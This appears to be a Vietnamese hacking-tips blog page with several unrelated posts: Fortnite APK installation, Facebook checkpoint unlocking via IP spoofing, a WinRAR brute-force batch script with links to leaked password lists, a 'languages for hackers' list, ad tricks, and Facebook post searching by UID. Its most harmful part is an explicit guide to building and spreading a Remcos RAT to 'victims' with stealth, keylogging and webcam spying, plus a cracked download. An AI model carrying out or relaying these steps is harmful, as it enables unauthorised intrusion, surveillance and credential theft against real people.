Home Blog

Hướng dẫn cách cài game Fortnite trên Android không cần playstore

0

Thời gian gần đây game Fornite đã bị gỡ khỏi Play Store và Apple Store khiến không ít bạn gặp khó khăn trong việc tải và cài đặt game trên điện thoại. Chính vì vậy trong bài viết này, mình sẽ mang đến cho bạn một hướng dẫn để có thể cài đặt Fornite trên điện thoại Android mà không cần sử dụng Play Store. Mình cũng đã đề cập đến một hướng dẫn trong trường hợp bạn đang gặp phải bất kỳ vấn đề cài đặt nào liên quan đến Fortnite trên Android. Chỉ cần vậy thôi, bắt tay vào làm nào 😀

Cài đặt Fortnite trên Android mà không cần Play Store (2020)

Cài đặt Fortnite trên các thiết bị Android tương thích

1. Trước hết, hãy mở trang web của Epic Games tại Epic Games để có thể tải xuống file APK, Click vào nút “Get it on the Epic Games App”. Sau khi tải xuống hoàn tất, bạn có thể kéo thanh status bar xuống và bấm vào file APK vừa tải để cài Fornite không cần play store

Install Fortnite on Android Without Play Store
Hướng dẫn tải apk fornite tại website

2. Ở bước này Android sẽ hỏi bạn có đồng ý mở không. Bấm vào “Settings” và mở phần “Allow from this source”. Điều này sẽ cho phép bạn cài đặt Fortnite trên Android mà không cần Cửa hàng Play (Không chỉ mỗi fornite mà ứng dụng nào cũng vậy).

Install Fortnite on Android Without Play Store

3.Sau khi bạn mở xong, thì bấm nút back để trở về, lúc này bạn sẽ được chuyển tới phần cài đặt game Fornite không cần Play Store, bấm vào nút Install để bắt đầu cài đặt game

Install Fortnite on Android Without Play Store

4. Sau khi cài đặt xong,mở  “Fortnite” và bấm vào nút “Install”. Như vậy là bạn đã có thể cài đặt Fornite mà không cần play store.

Install Fortnite on Android Without Play Store

Cài đặt game Fortnite trên Android không cần Play Store (Cho thiết bị Samsung)

1. Nếu bạn đang sử dụng máy Samsung để đọc bài viết này thì chúc mừng bạn, bạn có thể dễ dàng cài đặt Fornite mà không cần làm theo các bước trên. CHỉ cần mở Galaxy Store và tìm kiếm cụm từ “Epic Games”.

Install Fortnite on Android Without Play Store (For Samsung Devices)

2. Bây giờ thì chỉ cần mở app Fornite lên và bấm vào cài đặt Fornite là bạn có thể cài fornite trên máy bạn dễ dàng mà không cần phải tải file APK.

Install Fortnite on Android Without Play Store (For Samsung Devices)

Chúc bạn thành công <3

loading...

Tut Unlock Checkpoint Facebook loại Checkpoint 72h 2020

0

Hello mọi người, trong bài viết này mình sẽ hướng dẫn mọi người cách unlock dạng checkpoint facebook mới của năm nay. Như các bạn đã biết thì gần đây, nhiều người dùng Facebook đã gặp phải tình trạng checkpoint mới, đây là một loại checkpoint dame chéo khá giống với checkpoint 72h mà Facebook đang sử dụng để khoá tài khoản.

Khi unlock bình thường thì bạn sẽ phải tiến hành upload CMND lên cho Facebook để xét duyệt, tuy nhiên với trường hợp này thì dù bạn có upload CMND kiểu gì thì cũng không lên được hoặc không được duyệt, vì các bạn bị các nick clone khác report chéo nên không thể mở được theo cách thông thường.

Tut Unlock Checkpoint Facebook loại Checkpoint 72h 2020

Để unlock được thì các bạn tiến hành làm theo các bước như sau

Bước 1: Fake IP

Bước đầu tiên và quan trọng nhất là các bạn phải Fake IP. Với loại checkpoint dame chéo này thì các bạn cần fake ip sang USA ( Mỹ) và sử dụng ngôn ngữ của máy là ngôn ngữ tiếng Anh ( US) nhé. Để cho dễ dàng thì bạn có thể dùng các phần mềm VPN hoặc Proxy để fake ( Cái này có rất nhiều trên google nên mình sẽ không nói thêm ở đây nữa).

Bước 2: Báo cáo đăng nhập

Các bạn truy cập link sau để báo cáo với Facebook về vấn đề nick bị checkpoint  Báo cáo vấn đề đăng nhập

  • Screenshot ( Chụp màn hình) lại hình ảnh lỗi lúc bạn đăng nhập ( Cái này chắc mình không cần hướng dẫn nữa)
  • Trong ô mô tả vấn đề, bạn copy y nguyên đoạn sau dán vào làm lý do unlock checkpoint 72h

Hello facebook team, I am the owner of this account, currently my account is having problems, all the papers I have submitted are suspended and unable to verify this is my account, I am full. If I am the owner of this account, I need the facebook team to support my account verification and unlock my account.

Bước 3: Tải xuống thông tin

Bạn Truy cập và tải xuống thông tin của bạn trên Facebook. (Trong đây vẫn phải fake IP thì bạn mới có thể truy cập vào được nhé)

Chọn Thông tin này chưa giải đáp thắc mắc của tôi->Tôi không có tài khoản Facebook

Tut unlock dame chéo tương tự 72h

Ở phần này các bạn điền đẩy đủ tất cả những gì mà Facebook yêu cầu,

Tiếp tục dán đoạn trên vào, tick vào ô Tôi đồng ý vào và Gửi.

Xem thêm :

Bước 4: Gửi Feedback

: Vào Link Feedback Facebook 

  • Chọn Login (Đăng nhập).
  • Dán đoạn trên vào ô bên dưới

Như vậy là đã xong, bạn đã tự tay unlock checkpoint chéo tương tự checkpoint 72h cho chính mình mà không phải đi thuê ở đâu cả. Chúc bạn thành công. Nick sẽ về sau 24-48h thôi 😀

loading...

Bốn bước bẻ khoá mật khẩu, hack pass Winrar không cần phần mềm

0
dictionary attack là gì
dictionary attack là gì?

WinRAR từ trước tới nay vẫn được xem là một phần mềm nén và giải nén rất hiệu quả. Hầu như 90% người dùng máy tính thì đều cài winrar để phục vụ mục đích nén và giải nén. Cũng như nhiều phần mềm khác, winrar cũng hỗ trợ các bạn đặt mật khẩu cho file nén, cơn ác mộng xảy đến khi một ngày trời không đẹp nữa bạn quên mật khẩu giải nén, vậy lúc này cần làm gì ??

Để bẻ khoá được mật khẩu winrar thì trên mạng cũng chia sẻ rất nhiều cách từ phức tạp cho đến đơn giản ai cũng làm được, trong bài viết này thì mình sẽ hướng dẫn mọi người một cách trung bình :))) Không khó nhưng không phải ai cũng làm được :v Đó chính là sử dụng Dictionary Attack. Ai chưa biết gì mà muốn làm được thì có thể tìm hiểu qua về Dictionary Attack tại đây, mình đã từng nói qua về nó

Bắt đầu nào!

Bước 1: Sao chép đoạn mã sau và lưu vào notepad. Sau đó đặt tên file có đuôi .bat. Ở đây mình để là crack.bat.

Mình sau đó copy file và để vào ổ D:

@echo off>NUL
IF NOT EXIST "%programfiles%\Winrar\UnRAR.exe" (
CALL :missing
) ELSE (
Copy /Y "%programfiles%\Winrar\UnRAR.exe"
)
CLS
Title .Rar Breach PRO ^| Welcome %USERNAME%!
echo   ------------------------------------
echo                 ___  ___   ___    
echo                / _ \/ _ ^| / _ \  
echo          ___  / , _/ __ ^|/ , _/__
echo         / _ )/_/^|_/_/_^|_/_/^|_^|/ /
echo        / _  / __/ -_) _ `/ __/ _ \
echo       /____/_/  \__/\_,_/\__/_//_/
echo   ------------------------------------
echo     WINRAR ARCHIVE BRUTE-FORCE SUITE
echo   ------------------------------------
echo.
Set/p "archive=ENTER FILE PATH TO .RAR ARCHIVE: "
Set/p "wordlist=ENTER FILE PATH TO WORDLIST: "
Set/p "destination=ENTER DESTINATION PATH FOR EXTRACTION: "
echo.
echo Strike any key to breach...
pause>NUL
Setlocal EnableDelayedExpansion
Set /a "i=0"
FOR /F "delims=" %%G IN (%wordlist%) DO (
set "pass=%%G"
set /a i=!i!+1
Echo THREAD [!i!] ATTEMPTING PASSWORD: !pass!
UNRAR E -INUL -P!PASS! "%archive%" "%destination%"
)
echo Brute force complete!
echo. & echo Strike any key to exit...
pause>NUL
ERASE /F /Q "UnRAR.exe"
Exit /B
:missing
Color 0C
echo Yikes! WinRAR decompression binary (UnRAR.exe) not found on system...
echo.
echo Install WinRAR from 'https://www.win-rar.com/' and try again.
pause & exit

Bước 2: Copy file rar đã bị quên mật khẩu vào ổ D:

Bước 3: Tìm file dictionary để attack

Như trong bài viết trước đã nói, file này là file chứa danh sách các mật khẩu để bẻ khoá thử.

Bạn có thể tải danh sách các file từ điển ở đây

  1. Join the ripper : http://ouo.io/RyJND
  2. Cain & Aben:  http://ouo.io/8VzgCG
  3. Conficker worm : http://ouo.io/jyv8A
  4. 500 worst pass: http://ouo.io/vwCgz
  5. 370 Banned Twitter passwords : http://ouo.io/ILyvZ
  6. Rockyou : http://ouo.io/asB5S
  7. phpBB : http://ouo.io/86KjC
  8. Big pass : http://ouo.io/jeKxG6 ( File có dung lượng hơn 4GB)
  9. Facebook L,1: http://ouo.io/yRyTOc
  10. Facebook L.2:  http://ouo.io/zesnV
  11. Facebook L.3: http://ouo.io/483HF
  12. Facebook L.4: http://ouo.io/LDeSor
  13. 8Gb file : http://ouo.io/HdGLu ( Chọn host Magnet để tải nhé )

Bây giờ thì trong ổ D của bạn sẽ có các file sau ( chính là các file chuẩn bị ở các bước trên)

  1. crack.bat -> Đây là file chuẩn bị ở bước 1 chứa code giải mã
  2. aaa.rar -> Đây là file rar cần giải mã chuẩn bị ở bước 2
  3. wordlist.txt -> Đây là danh sách mật khẩu cần dò

Bước 4:  Chạy chương trình crack.bat để bẻ khoá winrar

Mở CMD lên và gõ lần lượt như sau

  • Dòng đầu là file cần bẻ khoá, ở đây là: abc.rar
  • Địa chỉ file từ điển, ở đây là: wordlist.txt
  • Đường dẫn sẽ được giải nén: Nhấn Enter sẽ giải nén vào ổ D:
  • Cuối cùng là nhấn Enter lần nữa
Hack password, bẻ khoá winrar đơn giản bằng dictionary attack

Nếu thành công thì bạn sẽ thấy một folder mới được sinh ra, đây là folder chứa nội dung của file cần giải nén.

Chúc bạn thành công <3

loading...

TOP 9 ngôn ngữ lập trình cần thiết để trở thành Hacker

0

Để trở thành Hacker, không phải chỉ biết sử dụng các công cụ có sẵn mà bạn cần phải nắm vững ít nhất 1 trong các ngôn ngữ lập trình phổ biến. Việc nắm được thuật toán cũng như hiểu code bạn sẽ biết được đối tượng cần hack bị sơ hở ở những điểm nào. Nếu bạn đang băn khoăn chưa biết lựa chọn ngôn ngữ lập trình cần thiết để trở thành Hacker thì hãy xem qua TOP 15 ngôn ngữ lập trình được hacker ưa chuộng nhất nhé.

Ethical Hacking nghĩa là hack có đạo đức kiểu như hacker mũ trắng vậy, ám chỉ các pentesters (các nhà kiểm thử bảo mật) thâm nhập hợp pháp vào các doanh nghiệp để kiểm tra các lỗ hổng tiềm năng mà các tin tặc có thể tận dụng để tấn công. Mục đích của các pentesters này là tìm ra lỗ hổng và vá chúng trước các hackers. Ethical hackers sử dụng một loạt các chương trình hack và ngôn ngữ lập trình nhằm mục đích này.

Dưới đây, là 15 ngôn ngữ lập trình tốt nhất cho việc hacking của các ethical hackers. Tuy nhiên, trước khi đi sâu vào danh sách, bạn cần hiểu rằng ngôn ngữ lập trình tốt nhất để hack phụ thuộc vào cách thức cũng như loại hình tấn công mà bạn muốn thực hiện. Bất kỳ ngôn ngữ lập trình nào cũng có thể hỗ trợ bạn trong việc hacking, miễn là bạn có một chiến lược hoàn hảo.

Python

Trong 10 năm trở lại đây Python được coi là ngôn ngữ lập trình tốt nhất cho việc hacking. Vì thế nên các ethical hacker thường sử dụng ngôn ngữ lập trình này để viết các chương trình hack theo mục đích của họ. Từ việc kiểm tra tính toàn vẹn của các máy chủ đến tự động hoá hầu hết các chương trình hack của bạn, Python cho phép bạn làm hầu hết mọi thứ nếu bạn biết sử dụng đúng cách. Việc tiếp cận Python cũng khá dễ và không rườm rà như các ngôn ngữ khác, do đó đây là ngôn ngữ lập trình cần thiết để trở thành Hacker.

Điểm nổi bật của Python

Bản chất của Python là interpreted language (ngôn ngữ thông dịch) cho phép nó chạy mà không cần biên dịch.
Python cực kỳ dễ đọc, bởi vì cú pháp của nó rất đơn giản, vậy nên nó rất hữu ích để bắt đầu học ethical hacking.
Có một cộng đồng hùng hậu cung cấp cho bạn các plugins/thư viện hữu ích mỗi ngày.
Một trong những ngôn ngữ lập trình tốt nhất để hack web servers.
Hỗ trợ viết các chương trình tự động hoá khá dễ dàng.
Python cho phép bạn thực hiện việc trinh sát nhanh các network và làm cho việc tạo các prototype nhanh hơn nhiều.

SQL

SQL là viết tắt của Structured Query Language (ngôn ngữ truy vấn có cấu trúc) và là một trong những ngôn ngữ lập trình cần thiết để trở thành Hacker khi muốn hack web, phần mềm. Ngôn ngữ lập trình này được sử dụng để truy vấn, tìm và nạp thông tin từ cơ sở dữ liệu. Vì hầu hết các phần mềm đều dùng web để lưu trữ những thông tin có giá trị như thông tin người dùng ở một số dạng cơ sở dữ liệu. Đơn giản nhất là khai lỗi SQL Injection, bạn cần lắm rõ câu lệnh SQL mới thực hiện khai thác lỗ hỏng này.

Vậy nên SQL là ngôn ngữ lập trình tốt nhất để hack vào cơ sở dữ liệu của các công ty. Nếu bạn không hiểu biết đầy đủ về SQL, bạn sẽ không thể chống lại các cuộc tấn công cơ sở dữ liệu đâu.ngôn ngữ lập trình trở thành hacker

Điểm nổi bật của SQL

SQL được sử dụng chỉ để giao tiếp với cơ sở dữ liệu.
Những black hat sử dụng ngôn ngữ này để phát triển các chương trình hack dựa trên SQL injection.
SQL thường được sử dụng bởi tin tặc để truy vấn trái phép vào database, nhằm lấy các mật khẩu chưa được xoá.
Các cơ sở dữ liệu SQL phổ biến bao gồm MySQL, MS SQL, và PostgreSQL.
Xem thêm: Truy Cập Quyền Admin của Website không cần tài khoản

C

Ông tổ của các ngôn ngữ lập trình hiện đại, không có gì ngạc nhiên khi C được sử dụng rộng rãi trong ngành bảo mật. Bản chất cấp thấp của C cho nó một lợi thế nhất định khi so với các ngôn ngữ khác về việc truy cập các thành phần phần cứng cấp thấp như RAM. Các chuyên gia bảo mật chủ yếu sử dụng ngôn ngữ này khi họ cần thao tác với phần cứng và tài nguyên hệ thống cấp thấp. C cũng cung cấp cho các pentesters (những người kiểm thử bảo mật) khả năng viết nhanh các chương trình socket.

Điểm nổi bật của C

C là ngôn ngữ lập trình bậc thấp vậy nên nó rất nhanh.
Hầu hết các hệ thống hiện đại như Windows và Unix được viết bằng C, vì vậy việc thành thạo C là điều rất cần thiết nếu bạn muốn tìm hiểu kỹ các hệ thống này.
C thường được sử dụng để lấy quyền truy cập cấp thấp vào bộ nhớ và các quy trình hệ thống.
Các chuyên gia bảo mật kỳ cựu thường sử dụng C để mô phỏng các cuộc tấn công hijacking.

JavaScript

Nhờ sự ra đời gần đây của Node.JS, JavaScript đã vượt mặt PHP trong việc làm web. Vì vậy, nó đã trở thành ngôn ngữ lập trình tốt nhất để hack web. Các chuyên gia bảo mật thường sao chép các dòng lệnh JavaScript khai thác lỗ hổng XSS của các black hat. Vì ngôn ngữ này có thể thao túng các thành phần trong front-end cũng như back-end của web, nó đã trở thành ngôn ngữ tốt nhất để hack các ứng dụng web phức tạp.

Điểm nổi bật của JavaScript

Là lựa chọn tốt nhất cho việc khai thác lỗ hổng cross-site.
JavaScript có thể thao tác với DOM trên trình duyệt rất dễ dàng, làm cho nó trở thành một giải pháp tuyệt vời khi xây dựng internet worms.
JavaScript còn được sử dụng để mô phỏng các cuộc tấn công không chỉ ở phía server mà còn ở phía client.
JavaScript là ngôn ngữ dùng để tạo ra các adware, ngày càng nhiều trong thời gian gần đây.
Vì JavaScript có thể được sử dụng để xây dựng các phần mềm đa nền tảng, tin tặc có thể sử dụng nó cho các cuộc tấn công như buffer overflow và stack overflow.

PHP

PHP là từ viết tắt của Hypertext PreProcessor, một ngôn ngữ lập trình động dựa trên các CMS hiện đại như WordPress và Drupal. Các trang web cá nhân bạn thấy trên internet đều dựa trên các CMS này, nên kiến thức chuyên sâu về PHP là điều bắt buộc cho hacking. Vì vậy, nếu hack web là sở thích của bạn, thì mình khuyên bạn nên học PHP.

Điểm nổi bật của PHP

PHP được sử dụng rộng rãi trong server, nếu bạn muốn phát triển các chương trình hack máy chủ thì biết nên làm gì rồi đó.
Các trang web PHP cũ thường chứa các tập lệnh không còn dùng được nữa, các bạn có thể lợi dụng việc này để truy cập vào server dễ dàng hơn.
Hiểu sâu hơn về ngôn ngữ này giúp bạn sẵn sàng fix hoặc hack các trang web bị lỗi ngay khi phát hiện ra chúng.
PHP chắc chắn là ngôn ngữ lập trình tốt nhất để hack các trang web cá nhân.

C++

C++ (đọc là ci pi pi nhé) được cho là ngôn ngữ lập trình tốt nhất để hack các phần mềm của công ty. Vì hầu hết các phần mềm của công ty đều có giấy phép độc quyền và thường yêu cầu trả phí để kích hoạt, tin tặc phải decompile (dịch ngược mã nguồn) để có thể crack được phần mềm đó. Còn C++ cung cấp mức truy cập cần thiết để phân tích mã máy và bỏ qua các quy trình kích hoạt trên. Vì nên, nếu bạn muốn tự bẻ khoá phần mềm doanh nghiệp hoặc tự xây dựng các chương trình hack độc quyền, việc thành tạo C++ nên là ưu tiên hàng đầu của bạn.viết virus với C

Điểm nổi bật của C++

Bản chất hướng đối tượng của C++ cho phép tin tặc viết các chương trình hack nhanh chóng và hiệu quả.
C++ là static typing, giúp bạn tránh được rất nhiều lỗi nhỏ trong quá trình biên dịch.
Khả năng truy cập thành phần hệ thống cấp thấp giúp tin tặc có thể dễ dàng decompile phần mềm.
Tính năng đa hình bậc cao cho phép các lập trình viên viết các Metamorphic Viruses bằng C++.

Java

Java vẫn là ngôn ngữ lập trình được sử dụng rộng rãi nhất. Nó được sử dụng rất nhiều trên các máy chủ web hiện đại, Apache Tomcat và Spring MVC. Hơn nữa, với sự ra đời của Android, Java hiện đang chạy trên hơn 3 tỷ thiết bị di động. Vì vậy, Java là ngôn ngữ lập trình tốt nhất để các thiết bị di động.

Điểm nổi bật của Java

Cũng giống như C++, Java cũng được tin tặc sử dụng rộng rãi để decompile hoặc crack phần mềm trả phí.
Nó được sử dụng rất nhiều bởi những pentesters để quản lý các máy chủ.
Java còn được sử dụng để phát triển các chương trình hack hiện đại cho các ethical hackers tiên tiến.
Trái ngược với C++, Java có tính dynamic. Có nghĩa là một khi bạn viết chương trình hack bằng Java, bạn có thể chạy chúng trên bất kỳ nền tảng nào có hỗ trợ Java.
Hiểu sâu hơn về Java giúp bạn phát triển các chương trình hack cho Android.

Ruby

Một trong những ngôn ngữ lập trình tốt nhất để hack các hệ thống công ty đa mục đích, Ruby về mặt cú pháp rất giống Python. Mặc dù cả hai ngôn ngữ đều rất tuyệt vời trong việc tự động hoá các chương trình hack thông thường, nhưng Ruby tập trung vào web nhiều hơn. Ruby được cho là một trong những ngôn ngữ lập trình tốt nhất để hack do tính linh hoạt vượt trội của nó. Đây là lý do, Metasploit, một trong những công cụ pentest khét tiếng nhất đã chọn Ruby làm ngôn ngữ cơ bản.

Điểm nổi bật của Ruby

Học Ruby là điều rất cần thiết nếu bạn muốn làm chủ nghệ thuật exploits (khai thác) có hiệu quả.
Ngôn ngữ kịch bản này mượn rất nhiều cú pháp từ Smalltalk và là một lựa chọn tuyệt vời để viết các chương trình hack nhanh.
Ruby thường được sử dụng bởi các tin tặc kỳ cựu để viết CGI sau khi xâm phạm mạng.
Rất nhiều ứng dụng web thế hệ sau này được xây dựng trên nền tảng Rails, làm cho Ruby trở thành lựa chọn tốt nhất để hack chúng.

Sau khi chọn được một ngôn ngữ rồi, thì việc tiếp theo là học Kali Linux.

loading...

Hướng dẫn điều khiển trái phép máy tính người khác bằng Remcos

0

Hiện nay trên mạng có rất nhiều công cụ hỗ trợ điều khiển máy tính của người khác, trong bài này mình sẽ hướng dẫn mọi người một cách đó là sử dụng RAT có tên Remcos để thực hiện.

Remcos là một con RAT được viết bằng C++ và Delphi.

Các chức năng của RAT Remcos

Quản trị từ xa

Bạn có một máy tính và bạn muốn kiểm soát từ xa. Hoặc bạn là quản trị mạng một công ty lớn, bạn muốn quản trị hàng trăm máy tính cùng lúc. Remcos sẽ phù hợp với nhu cầu của bạn! Phần mềm hỗ trợ từ xa truyền thống (như RDP) không có các chức năng để kiểm soát nhiều hệ thống từ xa cùng một lúc.

điều khiển máy tính
Điều khiển máy tính bằng Remcos

Với Remcos, bạn có thể kiểm soát cùng lúc tất cả các máy tính trong nhà, công ty, trường học hoặc lớp học của bạn.

Hỗ trợ từ xa

Dễ dàng thực hiện các phiên hỗ trợ từ xa, nhờ vào các chức năng Remote Desktop và Chat tích hợp. Bạn có thể sử dụng Remcos làm trạm giám sát. Thay vì phải mua máy ảnh hoặc micrô, bạn chỉ cần sử dụng Webcam của máy tính.

Remote Anti-Theft

Máy tính của bạn bị trộm lấy mất? Sử dụng Remcos để chụp ảnh và theo dõi IP để tìm vị trí máy tính của bạn. Truy xuất các tập tin của bạn dễ dàng đến một vị trí an toàn. Sau đó xóa chúng trên máy tính từ xa của bạn để ngăn kẻ trộm truy cập tập tin của bạn. Xóa sạch cookie và mật khẩu được lưu trữ để ngăn kẻ xâm nhập đăng nhập vào tài khoản của bạn.

Proxy từ xa

Sử dụng Remcos làm proxy đáng tin cậy bằng giao thức SOCKS5:

  • Định tuyến lưu lượng truy cập internet của bạn qua các máy từ xa, bỏ qua kiểm duyệt internet.
  • Hỗ trợ SOCKS5 ở cả chế độ Direct và Reverse.

Cách sử dụng RAT Remcos Full

Đọc thêm : https://anonymousvn.org/botnet-va-cach-hoat-dong.hav/

Bước 1: NAT Port

Khi chơi RAT, điều tiên quyết là bạn phải NAT Port cho máy tính của bạn để lắng nghe kết nối từ client gửi về.

Bạn nên NAT PORT: 2404 để dễ cấu hình theo hướng dẫn bên dưới.

Bước 2: Build RAT Client

Mình sẽ hướng dẫn các bước cơ bản để bạn build Client RAT Remcos. Mục đích của việc này là bạn tạo ra con BOT để cài vào máy tính nạn nhân. Con BOT này sẽ gửi quyền truy cập máy tính nạn nhân về cho bạn, và có thể làm bất cứ điều bạn thích trên máy nạn nhân với các chức năng mình đã liệt kê ở phần trên.

Bạn chọn chức năng Build:

Ở chức năng Connection: Thiết lập IP/Port của Server (máy tính của bạn) để client gửi kết nối về.

  • IP/DNS: điền IP No-IP của bạn, hoặc IP WAN nhà bạn.
  • TCP Port: 2404

Sau đó click nút Add.

build RAT Remcos

Ở các Tab khác thiết lập các chức năng của RAT.

  • Installation: thiết lập chế độ ẩn mình của RAT. Rat sẽ núp lùm ở thư mục, tập tin nào, với tên ứng dụng gì. Nhìn giống đặc công nhỉ 😀
  • Steath: cho phép RAT ăn cắp những thông tin gì để gửi về cho bạn.
  • Keylogger: Ghi lại các hoạt động trên bàn phím. Có chức năng ghi online hoặc ghi offline.
  • Survelliance: Thiết lập chụp ảnh, ghi âm trên máy tính nạn nhân.
  • Build: Tạo file RAT client.

Sau khi thiết lập xong các tính năng. Bạn chọn Tab Build 

Nhấn nút Build –> Đặt tên cho Bot Client. Như trong hình bên dưới mình sẽ đặt tên là BackdoorZ.exe.

Nhiệm vụ của bạn là đi phát tán con BOT này vào máy nạn nhân.

Bước 3: Remote RAT điều khiển máy tính nạn nhân

Khi Rat Client đã được chạy trên máy nạn nhân. Bạn chọn Tab Connetions sẽ thấy xuất hiện danh sách máy tính đã được cài cắm BOT Remcos. Chỉ cần click phải chuột vào một máy tính trong danh sáhc, và bắt đầu thực hiện điều khiển chúng.

Download RAT Remcos Full

Hiện nay, trên thị trường có 2 phiên bản RAT Remcos. Phiên bản đã Remcos 1.7 đã bẻ khóa đầy đủ tính năng. Còn phiên bản Remocs 2.0.6 mới ra chưa bẻ khóa được, nhưng với bản Free mà tác giả cung cấp, chúng ta vẫn sử dụng được ở mức độ theo dõi.

Với Remcos Free, bạn sẽ có quyền truy cập vào tất cả các chức năng quản lý và hỗ trợ hệ thống! Bạn sẽ dễ dàng có thể:

  • Thực hiện các phiên hỗ trợ từ xa dễ dàng bằng Remote Desktop và Chat.
  • Quản lý và truyền tập tin
  • Kiểm tra và quản lý Hệ thống của bạn (Trình quản lý quy trình, trình xem RAM/CPU thời gian thực, Remote Shell và nhiều hơn thế nữa).
  • Với Remcos Free, bạn có thể quản trị tối đa 10 máy từ xa cùng một lúc.

Bản 1.7 Crack Full tính năng

Sau khi giải nén file ra. Bạn cần chạy file “Remcos Loader” để bẻ khóa thành bản Full. Sau đó khởi động file remcos để build bot. Remcos 1.7 Full

Bản 2.0.6 Free hạn chế tính năng Remcos 2.0.6

loading...

Hướng dẫn nhận 53 triệu đồng tiền để chạy quảng cáo trên TikTok Ads

0

Trong bài viết này mình sẽ hướng dẫn các bạn xác minh tài khoản Tiktok và nhận tiền quảng cáo, tích lũy với tổng trị giá lên tới 53 triệu đồng

Hiện nay Tiktok đang là môi trường để bạn chạy quảng cáo hiệu quả. Với số lượng người dùng lớn nhất hiện nay khả năng tiếp cận quảng cáo đến khách hàng là rất lớn. Đây là mảnh đất màu mỡ để bạn kinh doanh hay quảng bá thương hiệu. Trong bài viết này, mình sẽ hướng dẫn bạn nhận 53 triệu tiền chạy quảng cáo miễn phí trên TikTok Ads.

Nếu tài khoản quảng cáo của bạn xuất hiện Popup như Ảnh 1 thì chúc mừng bạn, bạn là một trong những nhà quảng cáo được nhận gói quà tặng từ TikTok Ads.

Cách nhận 53 triệu tiền chạy TikTok Ads

Vậy làm cách nào để Xác minh và nhận được gói quà giá trị 53 triệu này?

Làm theo các bước dưới đây nha:

Bước 1: Bấm nút “Hoàn tất việc xác minh và nhận tiền ngay”

Click nhận tiền ngay để nhập 7 triệu tiền quảng cáo Tiktok

Bước 2: Bạn sẽ thấy mình đang ở Phần “Cài đặt tài khoản -> thông tin cơ bản”
– Kéo xuống bạn sẽ thấy phần Xác minh
– Điền thông tin theo Ảnh 2
– Tải lên giấy phép Kinh doanh
– Đợi 2 phút và F5 lại để xem kết quả

B3: Ra lại bảng điều khiển của Tài khoản quảng cáo
– Bấm vào icon bàn tay


– Xuất hiện cửa sổ như bên dưới, Bấm vào nút “Đã Xác Minh”

Bước 4: Bạn sẽ được chuyển tới Phần “Cài đăt tài khoản -> Thanh toán” ở đây bạn nhận được ngay 7.000.000vnđ (300 USD) + trực tiếp vào tài khoản quảng cáo.

– Tương tự ra lại bảng điều khiển để nhận Gói quà 46.000.000 vnđ

– Gói quà 46 triệu sẽ được hỗ trợ theo 1-1, Bạn nạp 46 triệu trong suốt quá trình chương trình diễn ra, bạn nhận được 46 triệu

*Lưu ý: Chương trình Tín dụng Quảng cáo này đang được thử nghiệm với một nhóm khách hàng chọn lọc.
Và những tài khoản này đã đáp ứng 1 số điều kiện của TikTok.

VD như: Đã đạt được 1 số tiền chi tiêu ngưỡng hằng ngày. Tài khoản quảng cáo bạn đã đăng ký sử dụng Giấy phép kinh doanh

loading...

Mẹo tắt quảng cáo Youtube chỉ bằng một dấu chấm

0

Quảng cáo là nguồn doanh thu từ các Youtuber, trong bài này mình không khuyến khích các bạn chặn quảng cáo Youtube, nhưng chúng ta sẽ tìm hiểu một lỗi giúp bạn xem video mà không hiển thị quảng cáo. Đây là mẹo trên reddit do thành viên unicorn4sale chia sẻ giúp bạn tắt quảng cáo Youtube.

Cách tắt quảng cáo Youtube chỉ cần thêm một dấu chấm

Ví dụ link sẽ có dạng: https://www.youtube.com/watch?v=kgEQMFxb3fM

Đối với các Video có quảng cáo trên Youtube sẽ xuất hiện quảng cáo ở đầu Video hoặc trong khoảng thời gian Video đang phát. Để biết Video có quảng cáo hay không, bạn xem ở dòng thời gian Video đang chạy có nút màu vàng không? Mỗi nút màu vàng là 1 quảng cáo sẽ hiển thị.

tắt quảng cáo Youtube

Nếu bạn muốn chặn quảng cáo Youtube mà không cần cài bất cứ phần mềm hay extension nào hãy thêm dấu chấm vào phía sau chữ com và trước dấu /

Ví dụ: https://www.youtube.com./watch?v=kgEQMFxb3fM

tắt quảng cáo youtube bằng dấu chấm

Bây giờ hãy thử mở video bất kỳ và thêm dấu . phía sau .com của youtube, bạn sẽ không bị làm phiền bởi các quảng cáo xuất hiện giữa chừng nửa.

Lý giải việc dấu chấm có thể tắt quảng cáo Youtube, tác giả giải thích rằng khi Quảng cáo được phân phối tới Website, nó kiểm tra xem tên website có đúng không? Việc thêm dấu chấm làm cho hostname của Youtube bị thay đổi, từ đó Quảng cáo không thể phân phối vào Youtube. Đây là lỗi phân giải tên miền của Youtube, làm cho quảng cáo không thể nhận diện được máy chủ đích.

Trong tương lai, nếu Youtube đã sửa lỗi này, nếu bạn vẫn muốn chặn quảng cáo trên Youtube có thể nâng cấp tài khoản lên YouTube Premium hoặc cài extension uBlock Origin, chương trình Adguard Pro.

loading...

Cách tìm tất cả bài viết của người khác trên Facebook cho kết quả chính xác

0

Trước đây Facebook có tính năng tìm kiếm bài viết của bạn bè hoặc bất kỳ ai. Nhưng vì một số lý do quyền riêng tư tính năng này đã bị loại bỏ. Nếu bạn muốn tìm tất cả bài viết của một người bạn nói bằng cách gõ từ khóa vào khung search của Facebook thì kết quả hầu như ra không chính xác với nội dung tìm kiếm. Với hướng dẫn dưới đây của Mod Nguyễn Nam Long – J2Team sẽ giúp bạn tìm kiếm nhanh và chính xác nội dung tìm kiếm bài viết trên Facebook.

Cách tìm tất cả bài viết của một người bất kỳ trên Facebook

Để tìm tất cả bài viết của người khác, trước tiên bạn cần xác định được UID của người cần tìm. Hiện có nhiều cách để xem UID Facebook của người khác như:

Cách 1: Click vào nút Block (Chặn) tài khoản của người bạn muốn tìm

block facebook

Rê chuột vào dòng chữ Take a break

take a break

Xem ở dưới trình duyệt có 1 dãy số 10……. ở phía sau username, đây chính là UID của người mà bạn muốn kiếm bài viết của họ. Hãy Copy UID này vào notepad.

lấy uid fb

Cách 2: Bạn copy link Profile Facebook của người muốn tìm UID, dán vào link https://findmyfbid.in/. Sau đó click vào Find Facebook ID, website sẽ hiển thị UID ra cho bạn.

Cách tìm tất cả bài viết của người khác trên Facebook cho kết quả chính xác 1

Sau khi đã có UID bạn copy dãy số vào chỗ đoạn Dán-ID-vào-đây

{"rp_author":"{\"name\":\"author\",\"args\":\"Dán-ID-vào-đây\"}"}

Ví dụ: ID của người mà bạn muốn tìm bài viết là: 100009143146364. Thì chúng ta sẽ có Code:

{"rp_author":"{\"name\":\"author\",\"args\":\"100009143146364\"}"}

Tiếp đến bạn cần mã hóa đoạn Code này sang base64. Truy cập vào trang

Copy Code có UID ở trên dán vào website, sau đó nhấn nút Encode để mã hóa.

lọc bài viết của người khác trên fb

